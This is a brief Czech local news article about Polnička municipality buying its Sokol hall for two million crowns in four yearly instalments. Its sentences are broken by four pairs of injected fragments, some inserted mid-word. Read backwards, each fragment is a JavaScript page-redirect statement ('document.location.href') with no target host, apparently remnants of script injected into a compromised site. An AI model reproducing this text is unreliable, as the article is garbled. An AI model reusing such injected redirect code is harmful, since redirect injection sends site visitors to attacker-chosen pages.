Rainbow page separator

V Polničce odkoupí sokolovnu do majetku obce na splátky

Úterý, 24. ledna 2017

Peníze, papírové bankovky

Polnička / Do majetku obce chtějí v Polničce od České obce sokolské odkoupit budovu sokolovny, koncem minulého roku [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to schválili tamní zastupitelé. Cena byla stanovena na dva miliony korun s tím, že Polnička za budovu zaplatí postupně v průběhu čtyř let, vždycky jednou půlmilionovou splátkou ročně.
„Akce je předjednaná, v lednu záměr ještě bude schvalovat Česká obec sokolská v Praze, v únoru by mělo dojít k podpisu smlouvy,“ informoval mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Polničky Luboš Zeman. První splátka za sokolovnu by tak měla být uhrazena ještě v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce. Další finance v řádu milionů korun budou později třeba na rekonstrukční práce v objektu sokolovny.
Polnička tamní sokolovnu využívá, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak pro potřeby základní školy, tak i pro pořádání různých kulturních a společenských akcí.